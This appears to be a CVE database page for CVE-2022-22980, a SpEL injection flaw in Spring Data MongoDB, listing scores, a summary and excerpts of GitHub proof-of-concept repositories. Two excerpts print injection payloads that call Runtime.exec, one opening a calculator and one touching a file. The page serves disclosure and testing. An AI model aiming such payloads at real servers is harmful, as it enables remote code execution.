CVE-2022-22980

Published: 23/06/2022 Updated: 30/06/2022
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 608
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized.

Vulnerable Product

vmware spring data mongodb

vmware spring data mongodb 3.4.0

Vendor Advisories

A Spring Data MongoDB application is vulnerable to SpEL Injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized ...

Github Repositories

Poc of CVE-2022-22980

CVE-2022-22980 A local based poc of CVE-2022-22980, for the detail of this vulnerability see tanzu.vmware.com/security/cve-2022-22980. You need to install mongodb on localhost before running. And I've created a web based poc with docker on dockerv Run mvn spring-boot:run or open with IDEA, and launch the AccessingDataMongodbAp

CVE-2022-22980 environment

Spring-Data-Mongodb-Demo CVE-2022-22980 environment

CVE-2022-22980 exp && test range

spring-data-mongodb-cve-2022-22980-exp A marginal vulnerability of little practical use; this is only a record. Start redis, port 27017. Start the project; springboot starts on port 6666. GET /v1/user/get?username=T(javalangRuntime)getRuntime()exec('open+-a+calculatorapp') HTTP/11 Host: localhost:6666 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=09,en;q=08 User-Agent: Mozil

[CVE-2022-22980] Spring Data MongoDB SpEL Expression Injection

[CVE-2022-22980] Spring Data MongoDB SpEL Expression Injection. MongoDB is a scalable and flexible document-oriented NoSQL database that is used for high volume data storage. Instead of using tables and rows as in traditional relational databases, MongoDB makes use of collections and documents. Documents consist of key-value pairs which are the basic unit of data in M

spring data mongodb remote code execution | cve-2022-22980 poc

Spring_cve-2022-22980 spring data mongodb remote code execution | cve-2022-22980 poc Description A Spring Data MongoDB application is vulnerable to #SpEL #injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders for value binding if the input is not sanitized

CVE-2022-22980 environment

Spring-Data-Mongodb-Example CVE-2022-22980 environment Build docker environment docker build -t mongo docker run -dit -p 6666:6666 mongo Poc ➜ Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(javalangRuntime)getRuntime()exec("touch /tmp/aaaa")' {"timestamp":"2022-07-14T01:54:10

Tips and Tricks to organize backend code for Java and Spring Boot

Organizing your Java/Spring Boot backend Contents Background Maven Parent POM Maven enforcer Pipeline Quality-Control on Merge OWASP check - exclusion list Branching strategy and automatic versioning Configuration Management APIs - generation & sharing/consumption Automated System Integration Tests and Reports Additional Content Kafka Schema Definition Renovate
